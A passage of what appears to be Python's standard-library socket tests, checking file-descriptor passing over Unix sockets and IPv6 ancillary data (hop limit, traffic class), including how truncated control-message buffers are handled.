# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
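# Illustrative sketch of the descriptor-passing API exercised by
# SCMRightsTest (assumptions: a POSIX platform with AF_UNIX socketpair()
# and SCM_RIGHTS; the helper name is ours and nothing in this module calls
# it). It sends one file descriptor across an AF_UNIX socket pair and
# returns the duplicate received on the other side; the caller is
# responsible for closing the returned descriptor.
def _example_pass_fd(fd):
    sender, receiver = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    with sender, receiver:
        # The descriptor travels as SCM_RIGHTS ancillary data alongside at
        # least one byte of ordinary data.
        sender.sendmsg([b"x"],
                       [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                         array.array("i", [fd]))])
        msg, ancdata, flags, addr = receiver.recvmsg(
            1, socket.CMSG_SPACE(SIZEOF_INT))
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        fds = array.array("i")
        # Ignore any trailing partial int, as closeRecvmsgFDs() above does.
        fds.frombytes(
            cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        return fds[0]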
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
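# Illustrative sketch of the RFC 3542 usage exercised above (assumptions:
# an IPv6-capable host honoring IPV6_HOPLIMIT as sendmsg() ancillary data;
# the helper name is ours and nothing in this module calls it). It sends a
# single UDP datagram whose hop limit is supplied per-packet as ancillary
# data rather than via setsockopt().
def _example_send_with_hop_limit(data, addr, hop_limit=2):
    with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as s:
        return s.sendmsg([data],
                         [(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                           array.array("i", [hop_limit]))],
                         0, addr)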
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
